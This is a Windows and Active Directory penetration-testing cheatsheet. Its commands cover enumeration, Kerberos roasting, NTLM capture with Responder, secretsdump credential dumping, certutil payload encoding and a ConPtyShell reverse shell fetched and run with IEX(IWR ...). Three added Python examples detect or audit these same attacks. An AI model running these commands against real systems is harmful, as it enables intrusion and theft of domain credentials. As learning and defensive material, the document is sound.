Windows
Enumeration
Scripts
Winpeas
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany.exe -O
PrivescCheck
This script aims to enumerate common Windows configuration issues that can be leveraged for local privilege escalation. It also gathers various information that might be useful for exploitation and/or post-exploitation.
powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"
Enum4Linux
Enum4linux is a tool for enumerating information from Windows and Samba systems.
List Users
enum4linux -U ip
Blank user
enum4linux -a -u '' -p '' ip
With User
enum4linux -a -u user -p password ip
SMB
Port: 445
SMB is the network protocol Windows uses to share files, printers and other resources; Samba is the free implementation of it for Unix-like systems.
Nmap
nmap -p 445 --script smb-os-discovery ip
List Share
smbclient -L ip -U user
smbclient -L ip --no-pass
Connect
smbclient '//ip/SHARE' --no-pass
smbclient '//ip/SHARE' -U user%password
SmbMap
smbmap -H ip -u anonymous
smbmap -u user -p pass -H ip
Bruteforce
crackmapexec smb ip -u users.txt -p password.txt
Bruteforce users (RID cycling)
crackmapexec smb -u 'user' -p 'pass' ip --rid-brute
MSRPC
Port: 135
"MSRPC is a protocol that uses the client-server model in order to allow one program to request service from a program on another computer without having to understand the details of that computer's network." · Hacktricks
Connect
rpcclient -U user ip
rpcclient $> enumdomusers
rpcclient $> enumdomgroups
rpcclient $> enumdomains
rpcclient $> getdompwinfo
rpcclient $> enumprivs
List Services
services.py user:password@ip list
rpcdump.py user:password@ip
IOXIDResolver is used for remote enumeration of a host's network interfaces through the DCOM IOXIDResolver interface.
python IOXIDResolver.py -t IP
WinRM
Port: 5985 / 5986
Windows Remote Management (WinRM) is a feature that allows administrators to remotely run management scripts, execute commands, and monitor and manage Windows systems on remote computers and servers.
Connect (gives a PowerShell session)
evil-winrm -i ip -u user -p password
evil-winrm -i ip -c certi.crt -k decrypted.key -p -u -S
Kerberos
Port: 88
Kerberos is an authentication protocol that is used to verify the identity of a user or host.
Bruteforce User
kerbrute userenum -d domain --dc ip user.txt
Get user ticket
Check whether Kerberos pre-authentication has been disabled for any of the listed accounts
GetNPUsers.py -usersfile user.txt -no-pass -format hashcat -dc-ip ip DOMAIN/
Enumusers
With msfconsole we are able to list valid users from a wordlist of usernames.
msf6 auxiliary(gather/kerberos_enumusers)
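Both kerbrute userenum and the Metasploit module above work the same way: they send an AS-REQ for every candidate name and read the KDC's answer, so each name that does not exist leaves an Event ID 4768 entry with Status 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN) on the domain controller. The following is an added example, not part of this cheatsheet or of either tool: a Python detection that flags a source address which produced many distinct unknown-principal errors inside a short window. The events, field names, window and threshold are constructed/assumed and should be tuned to the environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Security-log events exported as dicts. Event ID 4768 is
# "A Kerberos authentication ticket (TGT) was requested"; a Status of 0x6
# (KDC_ERR_C_PRINCIPAL_UNKNOWN) means the requested account does not exist,
# which is exactly what a username-guessing tool produces for each bad guess.
SAMPLE_EVENTS = [
    {"time": "2024-03-01T09:00:00", "event_id": 4768, "user": "alice",    "ip": "10.0.0.5",  "status": "0x0"},
    {"time": "2024-03-01T09:00:01", "event_id": 4768, "user": "jsmith",   "ip": "10.0.0.77", "status": "0x6"},
    {"time": "2024-03-01T09:00:01", "event_id": 4768, "user": "jdoe",     "ip": "10.0.0.77", "status": "0x6"},
    {"time": "2024-03-01T09:00:02", "event_id": 4768, "user": "admin",    "ip": "10.0.0.77", "status": "0x6"},
    {"time": "2024-03-01T09:00:02", "event_id": 4768, "user": "svc_sql",  "ip": "10.0.0.77", "status": "0x6"},
    {"time": "2024-03-01T09:00:03", "event_id": 4768, "user": "backup",   "ip": "10.0.0.77", "status": "0x6"},
    {"time": "2024-03-01T09:00:03", "event_id": 4768, "user": "Bob",      "ip": "10.0.0.77", "status": "0x6"},
    {"time": "2024-03-01T09:05:00", "event_id": 4768, "user": "bob",      "ip": "10.0.0.9",  "status": "0x0"},
    {"time": "2024-03-01T09:30:00", "event_id": 4768, "user": "typo_usr", "ip": "10.0.0.9",  "status": "0x6"},
    {"time": "2024-03-01T09:30:20", "event_id": 4771, "user": "bob",      "ip": "10.0.0.9",  "status": "0x18"},
]


def detect_kerberos_user_enum(events, window=timedelta(seconds=60), min_unknown=5):
    """Return {source_ip: sorted probed names} for every source that produced at
    least `min_unknown` distinct unknown-principal errors inside one `window`.
    A single typo from a real user (10.0.0.9 above) stays below the threshold."""
    per_ip = defaultdict(list)
    for ev in events:
        # Only the unknown-principal failures matter; successes and 4771
        # pre-auth failures (wrong password for a real account) are ignored.
        if ev["event_id"] == 4768 and ev["status"].lower() == "0x6":
            per_ip[ev["ip"]].append((datetime.fromisoformat(ev["time"]), ev["user"].lower()))

    alerts = {}
    for ip, probes in per_ip.items():
        probes.sort()  # chronological, so each start index opens one window
        for start, (t0, _) in enumerate(probes):
            names = {name for t, name in probes[start:] if t - t0 <= window}
            if len(names) >= min_unknown:
                alerts[ip] = sorted(names)
                break
    return alerts


if __name__ == "__main__":
    for ip, names in detect_kerberos_user_enum(SAMPLE_EVENTS).items():
        print(f"{ip}: {len(names)} non-existent accounts probed -> {', '.join(names)}")
```

Counting distinct names rather than raw events is deliberate: a misconfigured service retrying one bad principal generates many 0x6 events but only one name, while enumeration touches a new name per request.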
Ldap
Port: 389, 636
The Lightweight Directory Access Protocol (LDAP) makes it possible for applications to query user information rapidly.
Nmap
nmap -n -sV --script "ldap* and not brute" -p 389 ip
Ldapsearch
ldapsearch -x -H ldap://IP -b DC=EXAMPLE,DC=COM
Ldapdomaindump
ldapdomaindump is a tool for gathering information from LDAP (you need the credentials of a domain user to use it).
ldapdomaindump IP -u 'DOMAIN\USER' -p PASSWORD --no-json --no-grep
gMSADumper
gMSADumper reads the managed password of group managed service accounts (gMSA) that the supplied user is permitted to retrieve.
python gMSADumper.py -u USER -p PASSWORD -d DOMAIN
IMPACKET
GetUserSPNs
GetUserSPNs finds Service Principal Names that are associated with normal user accounts and requests the corresponding Kerberos service tickets, which hashcat can then crack offline.
python GetUserSPNs.py -dc-ip IP -outputfile KERBEROS_FILE_OUTPUT -request -debug <DOMAIN>/<USER>
hashcat -m 13100 --force -a 0 KERBEROS_FILE /usr/share/wordlists/rockyou.txt
Responder
Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. Basically a rogue everything, used for example to capture NTLM hashes and usernames. (source)
Server (attacker) :
python Responder.py -I interface
Client (victim):
gci \\ip\test\test
GetNPUsers
GetNPUsers.py will attempt to list and get TGTs for those users that have the property 'Do not require Kerberos preauthentication' set.
python GetNPUsers.py -usersfile USER_LIST_FILE -no-pass -dc-ip IP DOMAIN/
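The two impacket scripts above, GetUserSPNs and GetNPUsers, only get results from accounts the directory itself exposes: user accounts carrying a servicePrincipalName, and accounts whose userAccountControl has the DONT_REQ_PREAUTH bit set. The following is an added example, not impacket's code and not part of this cheatsheet: a Python audit over records in the shape an LDAP dump (ldapdomaindump, ldapsearch) returns, listing the accounts a defender should fix first. The flag values are the documented Active Directory ones; the accounts, the corp.local domain and the severity rules are constructed.

```python
# userAccountControl bit flags as documented for Active Directory.
ACCOUNTDISABLE = 0x0002
WORKSTATION_TRUST_ACCOUNT = 0x1000
DONT_EXPIRE_PASSWORD = 0x10000
DONT_REQ_PREAUTH = 0x400000

PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators"}

# Constructed sample in the shape an LDAP dump returns (real AD attribute names,
# made-up accounts and domain).
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "alice", "userAccountControl": 0x200,
     "servicePrincipalName": [], "memberOf": ["CN=Domain Users,CN=Users,DC=corp,DC=local"]},
    {"sAMAccountName": "svc_sql", "userAccountControl": 0x200 | DONT_EXPIRE_PASSWORD,
     "servicePrincipalName": ["MSSQLSvc/sql01.corp.local:1433"],
     "memberOf": ["CN=Domain Admins,CN=Users,DC=corp,DC=local"]},
    {"sAMAccountName": "legacy_app", "userAccountControl": 0x200 | DONT_REQ_PREAUTH,
     "servicePrincipalName": [], "memberOf": []},
    {"sAMAccountName": "old_vendor", "userAccountControl": 0x200 | DONT_REQ_PREAUTH | ACCOUNTDISABLE,
     "servicePrincipalName": [], "memberOf": []},
    {"sAMAccountName": "SQL01$", "userAccountControl": WORKSTATION_TRUST_ACCOUNT,
     "servicePrincipalName": ["HOST/SQL01", "MSSQLSvc/sql01.corp.local"], "memberOf": []},
]


def group_names(member_of):
    """Turn memberOf DNs into the set of their leading CN values."""
    return {dn.split(",", 1)[0].split("=", 1)[1] for dn in member_of}


def audit_kerberos_exposure(accounts):
    """Return (account, issue, severity) for every enabled user account that is
    AS-REP roastable (pre-auth disabled) or kerberoastable (has an SPN)."""
    findings = []
    for acct in accounts:
        name = acct["sAMAccountName"]
        uac = acct["userAccountControl"]
        if uac & (ACCOUNTDISABLE | WORKSTATION_TRUST_ACCOUNT):
            # Disabled accounts get no tickets; machine accounts have random
            # 120-character passwords that offline cracking will not recover.
            continue
        privileged = bool(group_names(acct.get("memberOf", [])) & PRIVILEGED_GROUPS)
        if uac & DONT_REQ_PREAUTH:
            findings.append((name, "AS-REP roastable: pre-authentication not required",
                             "high" if privileged else "medium"))
        if acct.get("servicePrincipalName"):
            # A service account whose password never expires is the classic
            # weak, years-old credential; rank it with the privileged ones.
            never_expires = bool(uac & DONT_EXPIRE_PASSWORD)
            findings.append((name, "kerberoastable: SPN on a user account",
                             "high" if privileged or never_expires else "medium"))
    return findings


if __name__ == "__main__":
    for name, issue, severity in audit_kerberos_exposure(SAMPLE_ACCOUNTS):
        print(f"[{severity}] {name}: {issue}")
```

The usual fixes are to re-enable pre-authentication (clear the flag), move SPNs onto gMSAs (which is what the gMSADumper section above is about) and rotate any long-lived service-account password that cannot be migrated.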
secretsdump
secretsdump dumps Active Directory password hashes.
python secretsdump.py -just-dc-ntlm DOMAIN/USER@DOMAIN_CONTROLLER
python secretsdump.py DOMAIN/USER:PASSWORD@IP
Exfiltration
Certutil (base64 encode/decode)
certutil -encode payload.dll payload.b64
certutil -decode payload.b64 payload.dll
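certutil -encode wraps any file in PEM armour (BEGIN/END CERTIFICATE lines around base64 split into 64-character CRLF lines), so a ".b64" or ".crt" found on a host may be anything, not a certificate. The following is an added example, not part of this page or of certutil: a Python triage helper that reproduces that layout only to build constructed samples, decodes it the way certutil -decode would, and reports what the decoded bytes really are from their leading magic.

```python
import base64
import re

# Header/footer pair as certutil writes it; the backreference keeps them matched.
PEM_BLOCK = re.compile(r"-----BEGIN ([^-]+)-----(.*?)-----END \1-----", re.S)


def certutil_style_wrap(data: bytes, label: str = "CERTIFICATE") -> str:
    """Produce the layout `certutil -encode` writes: PEM header, base64 in
    64-character lines with CRLF endings, PEM footer. Used here only to build
    the constructed samples below."""
    b64 = base64.b64encode(data).decode("ascii")
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return f"-----BEGIN {label}-----\r\n" + "\r\n".join(lines) + f"\r\n-----END {label}-----\r\n"


def certutil_decode(text: str) -> bytes:
    """Equivalent of `certutil -decode`: strip the PEM armour, join the lines
    and base64-decode them strictly (garbage characters raise instead of being skipped)."""
    m = PEM_BLOCK.search(text)
    if not m:
        raise ValueError("no PEM header/footer pair found")
    return base64.b64decode("".join(m.group(2).split()), validate=True)


def classify(data: bytes) -> str:
    """Say what the decoded bytes actually are, regardless of the PEM label."""
    if data[:2] == b"MZ":
        return "PE executable"
    if data[:2] == b"PK":
        return "ZIP archive"
    if data[:1] == b"\x30":  # ASN.1 SEQUENCE: what a genuine DER certificate starts with
        return "DER-encoded ASN.1 (plausibly a real certificate)"
    return "unknown"


def triage_b64_artifact(text: str) -> dict:
    """Summarise one suspicious PEM-looking file: claimed label, real size, real type."""
    data = certutil_decode(text)
    return {"label": PEM_BLOCK.search(text).group(1), "size": len(data), "kind": classify(data)}


# Constructed samples: a fake PE stub and a fake DER blob, both wrapped as a "certificate".
FAKE_PE = b"MZ\x90\x00" + b"\x00" * 56 + b"PE\x00\x00" + b"\x00" * 100
FAKE_DER = b"\x30\x82\x01\x0a" + b"\x02\x01\x00" + b"\x00" * 20
SAMPLE_PAYLOAD_B64 = certutil_style_wrap(FAKE_PE)
SAMPLE_CERT_B64 = certutil_style_wrap(FAKE_DER)

if __name__ == "__main__":
    for sample in (SAMPLE_PAYLOAD_B64, SAMPLE_CERT_B64):
        print(triage_b64_artifact(sample))
```

Run it over real artefacts by reading the file into `text`; a "CERTIFICATE" whose body decodes to an MZ header is the thing worth escalating, and the same mismatch check works for any other label certutil or a script may have used.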
Download file
Invoke-WebRequest -Uri http://example.com -OutFile file.out
DMP File
Extract
foremost file.dmp
Volatility
vol -f memory.dmp PLUGIN | tee output_scan
PLUGIN is a Volatility 3 plugin name, for example windows.pslist
Bulk Extractor
bulk_extractor -o bulk_output memory.dmp
Virus
Virus Total
Analyses suspicious files, domains, IPs and URLs to detect malware and other breaches, and automatically shares them with the security community.
VirusTotal aggregates many antivirus products and online scan engines, called Contributors.
Cobalt Strike
Reverse shell
ConPtyShell
ConPtyShell is a Fully Interactive Reverse Shell for Windows systems. source
Server :
stty raw -echo; (stty size; cat) | nc -lvnp port
Client with internet access:
IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell ip port
Client without internet access: create shell.ps1, paste the contents of Invoke-ConPtyShell.ps1 into it, and add Invoke-ConPtyShell ip port on a new line.
Interactive Windows cheatsheet : Wadcoms